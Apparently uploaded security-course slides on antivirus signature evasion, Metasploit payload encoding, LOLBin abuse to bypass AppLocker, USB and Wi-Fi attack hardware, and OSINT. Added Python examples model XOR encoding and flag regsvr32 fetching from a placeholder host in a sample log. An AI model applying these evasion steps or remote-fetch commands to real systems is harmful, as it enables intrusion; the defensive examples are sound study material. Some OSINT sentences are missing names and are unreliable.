Unit 5 - Windows Credential Attacks

The document outlines methods for identifying and modifying antivirus signatures to evade detection, including the use of encoders and encrypters. It discusses tools like Metasploit for payload encoding and highlights the use of Living off the Land Binaries (LOLBins) to bypass security measures like AppLocker. Additionally, it covers hardware hacking tools, Wi-Fi and USB hacking tools, and the OSINT framework for effective data gathering and analysis.

Uploaded by ntejha04
Windows Credential Attacks
UNIT - 5
Process of finding the antivirus signature from a detected file
Analyzing the detected file
• Once the antivirus software has flagged a file, it's important to understand the structure of the file and identify the specific part that triggers the antivirus detection.
• This can be done using various reverse engineering tools like disassemblers, debuggers, and hex editors.
Identifying the signature
• Antivirus software uses signatures to identify known malware or suspicious code patterns. A signature is a unique sequence of bytes or a pattern within the file.
• By analyzing the detected file and comparing it with known malware samples, it's possible to identify the specific signature the antivirus is using to detect the file.
Process of finding the antivirus signature from a detected file
Modifying the file to evade detection
• Once the signature has been identified, the file can be modified in such a way that the signature is no longer recognizable by the antivirus software.
• This can be done by changing the code, encrypting the payload, or using other obfuscation techniques to alter the signature while maintaining the functionality of the file.
Testing the modified file
• After modifying the file, it's essential to test it against the antivirus software to confirm that it no longer triggers detection.
• This may require multiple iterations of modification and testing, as antivirus software often employs multiple layers of detection, including heuristic analysis and behavioral analysis.
Process of finding the antivirus signature from a detected file
Updating the antivirus software
• As a responsible user, it is crucial to report the bypass to the antivirus vendor so that they can update their software and improve detection capabilities.
• This helps to keep the digital ecosystem secure for all users.
Encoders and Encrypters
The purpose of encoders and encrypters is to obfuscate the payload, making it harder for antivirus software and other security tools to detect the malicious code.

Encoders
• An encoder is a tool used to transform a payload's binary data into a different representation while maintaining the original data's integrity.
• The primary goal of an encoder is to avoid specific patterns or characters that might trigger antivirus detection or cause issues with payload delivery.
Encoders and Encrypters
• For example, certain characters might not be allowed in some systems or could be easily recognized by security tools.
• Encoders use various encoding schemes, such as Base64, XOR, or custom algorithms, to transform the payload data into an alternative representation that does not contain these problematic characters or patterns.
• However, encoding is not meant to provide confidentiality.
• It is relatively easy to reverse the process and obtain the original payload if the encoding scheme is known.
Encoders and Encrypters
Encrypters
• An encrypter is a tool that uses cryptographic techniques to secure and conceal a payload's content.
• Unlike encoders, encrypters aim to provide confidentiality and ensure that unauthorized parties cannot easily understand or analyze the payload.
• Encrypters use various encryption algorithms, such as AES, RSA, or custom algorithms, to encrypt the payload data.
• These algorithms require a key to encrypt and decrypt the data.
• Only parties with the correct key can decrypt and access the original payload.
Encoders and Encrypters
Encrypters add an additional layer of security compared to encoders, as decrypting the payload requires knowledge of the encryption algorithm and the key.

However, this also means that the malware must include a decryption routine and the key within its code or rely on a separate mechanism to decrypt the payload before execution.
Using Metasploit to evade antivirus and bypass detection

• Metasploit provides a feature called "payload encoding" to help with antivirus evasion.
• The primary goal of payload encoding is to modify the payload's binary representation to bypass signature-based detection methods employed by antivirus software.

Selecting a payload
• In Metasploit, a payload is the code that will be executed on the target system upon successful exploitation.
• Metasploit offers various payloads, such as reverse shells or Meterpreter sessions, which can be used depending on the tester's needs.
Using Metasploit to evade antivirus and bypass detection

Encoding the payload
• Metasploit provides several encoders to modify the payload's binary data.
• These encoders use different encoding techniques, such as XOR or custom algorithms, to change the payload's appearance while maintaining its functionality.

Generating the executable
• Once the payload has been encoded, Metasploit can generate an executable file that contains the encoded payload along with a stub (a small piece of code) that is responsible for decoding the payload at runtime.
Using Metasploit to evade antivirus and bypass detection

Evading antivirus detection
When the target system receives and runs the executable, the stub will decode the payload, and the payload will be executed without being detected by the antivirus software, provided that the encoding was successful in bypassing the antivirus signatures.
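Added example, not from the slides and not Metasploit code: a Python toy model of the signature-identification and encoder slides above and of the decoder-stub point in the Metasploit slides. It shows why a byte signature on the payload stops matching after XOR encoding, why the constant decoder stub is itself a signature target, and how an analyst recovers a single-byte XOR key by brute force. The signature, stub marker and payload bytes are all constructed.

```python
from typing import Optional

SIGNATURE = b"CMD:OPEN_REVERSE_CHANNEL"        # constructed "known-bad" byte pattern
STUB_MARKER = b"XORSTUB:"                      # constructed stand-in for a constant decoder stub
PAYLOAD = b"HDR\x00" + SIGNATURE + b"\x00END"  # constructed payload body containing the signature

def has_signature(blob: bytes, signature: bytes = SIGNATURE) -> bool:
    """Naive signature scan: does the exact byte pattern occur anywhere?"""
    return signature in blob

def xor_bytes(data: bytes, key: int) -> bytes:
    """Single-byte XOR; encoding and decoding are the same operation."""
    return bytes(b ^ key for b in data)

def build_sample(key: int) -> bytes:
    """Model of an 'encoded executable': the constant stub, the key it needs at
    runtime, then the XOR-encoded payload. Key 0 would leave the bytes unchanged."""
    if not 1 <= key <= 255:
        raise ValueError("key must be 1..255")
    return STUB_MARKER + bytes([key]) + xor_bytes(PAYLOAD, key)

def recover_xor_key(encoded: bytes, known_plaintext: bytes = SIGNATURE) -> Optional[int]:
    """Analyst side: only 256 candidate keys exist, so try each until a pattern
    expected in the decoded data appears. None means no key fits."""
    for key in range(256):
        if known_plaintext in xor_bytes(encoded, key):
            return key
    return None

def analyse(sample: bytes) -> dict:
    """What a defender learns from one sample produced by build_sample()."""
    body = sample[len(STUB_MARKER) + 1:]          # skip the stub and the embedded key byte
    key = recover_xor_key(body)
    decoded = xor_bytes(body, key) if key is not None else b""
    return {
        "payload_signature_hit": has_signature(sample),            # False: bytes were changed
        "stub_signature_hit": has_signature(sample, STUB_MARKER),  # True: the stub never changes
        "recovered_key": key,
        "decoded_payload_hit": has_signature(decoded),             # True once decoded
    }
```

The defensive takeaway is the last two fields: the stub and the decoded content are where detection belongs, not the encoded bytes.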
LOLBins
• Living off the Land Binaries (LOLBins) are legitimate, pre-installed system tools or binaries that attackers can abuse to perform malicious activities.
• In offensive security testing, LOLBins are used to blend in with the target environment, making it difficult for security tools and system administrators to differentiate between legitimate and malicious activities.
• LOLBins are often used by attackers to bypass security measures, such as antivirus software or application whitelisting, as they are trusted and allowed to execute on the system.
• The use of LOLBins can also reduce the attacker's footprint, as there is no need to download or install additional malicious software.
LOLBins
• Here's an example of how LOLBins can be utilized in offensive security testing: PowerShell is a powerful scripting language and automation tool included in the Windows operating system.
• PowerShell can be used to perform various administrative tasks, but it can also be misused by attackers as a LOLBin for malicious purposes.
• One possible use case of PowerShell in offensive security testing involves downloading and executing a remote script.
• Using LOLBins in offensive security testing can help security professionals identify weaknesses in an organization's defenses and better understand how attackers might exploit such tools to compromise systems.
AppLocker
• AppLocker is a security feature introduced in Windows 7 and Windows Server 2008 R2 that allows administrators to control the execution of applications, scripts, and executable files based on publisher, file path, or file hash.
• AppLocker is designed to prevent unauthorized software, including potentially malicious applications, from running in a managed environment.
• It provides a flexible mechanism to create allow and deny rules based on organizational policies.
AppLocker
• While AppLocker is a useful security feature, it is not foolproof, and skilled attackers may attempt to bypass it.
• One technique to bypass AppLocker involves using Living off the Land Binaries (LOLBins): legitimate system tools or binaries that can be abused to perform malicious activities.
• Since AppLocker relies on whitelisting applications, attackers can leverage built-in Windows binaries with legitimate purposes and execute arbitrary code or scripts.
• By using LOLBins, attackers can bypass AppLocker restrictions because these binaries are usually trusted and allowed to run.
AppLocker
• Example of bypassing AppLocker using LOLBins
• One popular LOLBin is the Microsoft-signed binary "regsvr32.exe", which is used to register or unregister COM (Component Object Model) DLLs (Dynamic Link Libraries).
• However, it can also be used to execute arbitrary code or scripts remotely.
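Added example, not from the slides: a defender-side triage rule in Python, run over constructed log lines, for the LOLBin and AppLocker slides above. It flags regsvr32.exe when its arguments point at a remote location rather than a local DLL or when an Office application spawned it, and it surfaces AppLocker block (event 8004) and audit-mode (event 8003) entries. The key=value log format, the example.invalid host and all paths are invented; the AppLocker event IDs are real.

```python
import re

# Constructed log lines in an invented key=value form (not a real event format).
# example.invalid is a reserved placeholder domain; every path is made up.
SAMPLE_LOG = """\
type=process image=regsvr32.exe parent=winword.exe cmd="regsvr32.exe /s http://example.invalid/x"
type=process image=regsvr32.exe parent=svchost.exe cmd="regsvr32.exe /s C:\\Windows\\System32\\vbscript.dll"
type=applocker eventid=8004 file=C:\\Users\\alice\\Downloads\\tool.exe
type=applocker eventid=8003 file=C:\\Users\\alice\\AppData\\Local\\Temp\\run.ps1
type=applocker eventid=8002 file=C:\\Program Files\\App\\app.exe
"""

FIELD = re.compile(r'(\w+)=("[^"]*"|\S+)')
REMOTE_ARG = re.compile(r"https?://|\\\\", re.IGNORECASE)   # URL or UNC path in the arguments
OFFICE_PARENTS = {"winword.exe", "excel.exe", "outlook.exe", "powerpnt.exe"}
APPLOCKER_EVENTS = {"8004": "blocked by AppLocker",
                    "8003": "AppLocker audit mode: would have been blocked"}

def parse_line(line: str) -> dict:
    """Split one key=value line into a dict, dropping surrounding quotes."""
    return {k: v.strip('"') for k, v in FIELD.findall(line)}

def regsvr32_reasons(ev: dict) -> list:
    """Reasons a regsvr32 process event looks like LOLBin abuse (empty = benign)."""
    if ev.get("type") != "process" or ev.get("image", "").lower() != "regsvr32.exe":
        return []
    reasons = []
    if REMOTE_ARG.search(ev.get("cmd", "")):
        reasons.append("argument points to a remote location, not a local DLL")
    if ev.get("parent", "").lower() in OFFICE_PARENTS:
        reasons.append("spawned by an Office application")
    return reasons

def applocker_reason(ev: dict) -> str:
    """Map AppLocker event IDs to a triage note; 8002 (allowed) yields nothing."""
    if ev.get("type") != "applocker":
        return ""
    return APPLOCKER_EVENTS.get(ev.get("eventid", ""), "")

def triage(log: str) -> list:
    """Return (line number, reasons) for every line that deserves an analyst's attention."""
    findings = []
    for n, line in enumerate(log.splitlines(), 1):
        ev = parse_line(line)
        reasons = regsvr32_reasons(ev)
        note = applocker_reason(ev)
        if note:
            reasons.append(note)
        if reasons:
            findings.append((n, reasons))
    return findings
```

Running triage(SAMPLE_LOG) reports lines 1, 3 and 4; the local COM registration on line 2 and the allowed execution on line 5 stay quiet.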


Hardware Hacking Tools
ChipWhisperer: the first open-source, low-cost solution to expose weaknesses that exist in embedded systems all around us.

The Bus Pirate is simple and effective: type commands into a terminal on your computer, those commands are interpreted by the Bus Pirate and sent via the proper protocol. The Pirate will also interpret data sent from your embedded device back to your computer terminal.

The Saleae Logic 8 is a powerful logic analyzer that lets you record and display signals in your circuit, so you can debug it fast.

On-chip debug (OCD) interfaces can provide chip-level control of a target device and are a primary vector used by engineers, researchers, and hackers to extract program code or data, modify memory contents, or affect device operation on-the-fly. Depending on the complexity of the target device, manually locating available OCD interfaces can be a difficult and time-consuming task, sometimes requiring physical destruction or modification of the device.

JTAGulator is an open source hardware tool that assists in identifying OCD interfaces from test points, vias, component pads, or connectors on a target device.
Wi-Fi and USB Hacking Tools

1. USB Rubber Ducky
• Looks like a flash drive, but emulates a keyboard.
• Executes pre-programmed keystroke payloads rapidly.
• Ideal for social engineering, quick access attacks.

2. Bash Bunny
• Like Rubber Ducky, but more advanced.
• Can act as a keyboard, network adapter, USB storage, etc.
• Runs multiple attack payloads (exfiltration, spoofing, etc.).

3. LAN Turtle
• USB device that creates a backdoor into a network.
• Provides remote access, DNS spoofing, packet capture.
• Ideal for physical access attacks in corporate environments.

4. Cactus WHID
• Wireless HID injector (USB Rubber Ducky + ESP8266 WiFi).
• Can be controlled remotely via Wi-Fi.
• Great for long-range keystroke injection.

5. Digispark / MalDuino
• Cheaper alternatives to Rubber Ducky.
• Emulate HID devices for custom keystroke attacks.
Wi-Fi and USB Hacking Tools

1. Alfa AWUS036NHA / AWUS036ACH
• High-gain USB Wi-Fi adapters.
• Known for monitor mode, packet injection support.
• Compatible with Kali Linux, Aircrack-ng, Bettercap.

2. WiFi Pineapple (by Hak5)
• Dedicated Wi-Fi pentesting tool.
• Supports man-in-the-middle attacks, deauthentication, credential harvesting.
• Web UI makes it user-friendly.

3. ESP8266/ESP32 Deauther
• Low-cost microcontroller used for Wi-Fi deauth attacks.
• Can kick clients off networks or simulate fake APs.

4. Bettercap
• Powerful MITM and packet manipulation framework.
• Works over Wi-Fi, Bluetooth, Ethernet.
• Great for credential sniffing and spoofing.

6. Kismet
• Wireless sniffer and intrusion detection tool.
• Supports Wi-Fi, Bluetooth, ZigBee.

7. Fluxion
• Social engineering-based Wi-Fi attack tool.
• Creates a fake AP, asks users to re-enter the Wi-Fi password.
What is OSINT?
• OSINT (Open Source Intelligence) tools allow for the efficient gathering and analysis of publicly available data, which is used by government agencies and private organizations to analyze market trends, brand positioning, and more. These tools have advanced from traditional media to incorporate technologies like web scraping, social media analytics, geospatial intelligence, and AI to improve precision and speed in data processing.
OSINT Framework
• The OSINT Framework provides a structured approach to gathering publicly available information, benefiting security researchers, government agencies and cybersecurity professionals in information gathering.
• Structured with a systematic methodology, the OSINT Framework categorizes gathered information according to:
• Source
• Relevance
• Type
• Context
Source: osintframework.com
Utilizing OSINT Tools for Effective Data Harvesting
• Search Engines and Directories

According to Statcounter, owns a 61% market share in China, and Yandex, commanding over 71% of the Russian desktop search market (source: Statista), are essential for OSINT due to their widespread use. These search engines provide a wealth of localized data that can be leveraged for intelligence gathering.

Moreover, region-specific search engines such as Naver in South Korea and Seznam in the Czech Republic are particularly useful for OSINT, providing localized and tailored search results relevant to their respective areas.

• Social Media Monitoring

A social media search engine, focuses on specific terms and phrases, pulling results from over one hundred social media platforms. This tool allows analysts to gather a vast amount of information from various platforms, enhancing their ability to gather comprehensive data.

Trendsmap is used to analyze trending Twitter keywords and hashtags, featuring a robust spam detection system to ensure trend authenticity. Similarly, Hashatit allows users to search and analyze active hashtags across multiple social media platforms, collecting related posts in one place.

• Deep and Dark Web Exploration

TorBot, a Python-based OSINT tool for the dark web, is designed to crawl and index .onion sites, returning information such as page titles, addresses, and descriptions, while storing the results in JSON format.
Intelligence Cycle
Stages in the lifecycle
• Direction: The direction phase of the lifecycle is when you set goals for the threat intelligence program.
• Collection: Collection is the process of gathering information to address the most important intelligence requirements.
• Processing: Processing is the transformation of collected information into a format usable by the organization. Almost all raw data collected needs to be processed in some manner, whether by humans or machines.
• Analysis: Analysis is a human process that turns processed information into intelligence that can inform decisions.
• Dissemination: Dissemination involves getting the finished intelligence output to the places it needs to go.
• Feedback: Feedback is critically important for understanding your overall intelligence priorities and the requirements of the security teams that will be consuming the threat intelligence.
